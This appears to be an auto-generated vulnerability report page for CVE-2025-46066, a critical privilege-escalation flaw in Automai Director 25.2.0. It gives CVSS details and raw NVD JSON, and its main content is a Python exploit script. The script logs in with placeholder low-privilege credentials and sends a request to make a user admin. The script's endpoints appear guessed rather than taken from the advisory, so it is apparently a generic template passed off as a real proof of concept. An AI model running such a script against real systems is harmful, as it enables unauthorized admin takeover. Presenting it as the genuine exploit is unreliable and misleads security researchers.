Security Vulnerability Report
中文
CVE-2025-46066 CVSS 9.9 CRITICAL

CVE-2025-46066

Published: 2026-01-12 17:15:51
Last Modified: 2026-01-21 22:03:12

Description

An issue in Automai Director v.25.2.0 allows a remote attacker to escalate privileges

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:automai:director:25.2.0:*:*:*:*:*:*:* - VULNERABLE
Automai Director < 25.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-46066 PoC - Automai Director Privilege Escalation # Target: Automai Director v.25.2.0 target = sys.argv[1] if len(sys.argv) > 1 else "http://target:8090" # Step 1: Authenticate with low-privilege account login_url = f"{target}/api/auth/login" login_data = { "username": "lowpriv_user", "password": "password123" } session = requests.Session() response = session.post(login_url, json=login_data) if response.status_code != 200: print("[-] Authentication failed") sys.exit(1) print("[+] Authenticated successfully with low-privilege account") # Step 2: Exploit privilege escalation via API manipulation # Target the user management or role assignment endpoint payload_url = f"{target}/api/users/1/role" escalation_data = { "role": "admin", "privileges": ["all"] } response = session.put(payload_url, json=escalation_data) if response.status_code == 200: print("[+] Privilege escalation successful - User promoted to admin") print(f"[+] Response: {response.json()}") else: print(f"[-] Exploitation failed - Status: {response.status_code}") print(f"[-] Response: {response.text}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46066", "sourceIdentifier": "[email protected]", "published": "2026-01-12T17:15:50.700", "lastModified": "2026-01-21T22:03:12.350", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in Automai Director v.25.2.0 allows a remote attacker to escalate privileges"}, {"lang": "es", "value": "Un problema en Automai Director v.25.2.0 permite a un atacante remoto escalar privilegios"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-280"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:automai:director:25.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "AF2B061D-416A-4030-B152-A4F9EDD8AA27"}]}]}], "references": [{"url": "https://gist.github.com/ZeroBreach-GmbH/4e325d09d08e16efb506076da2184f42", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.automai.com/", "source": "[email protected]", "tags": ["Product"]}]}}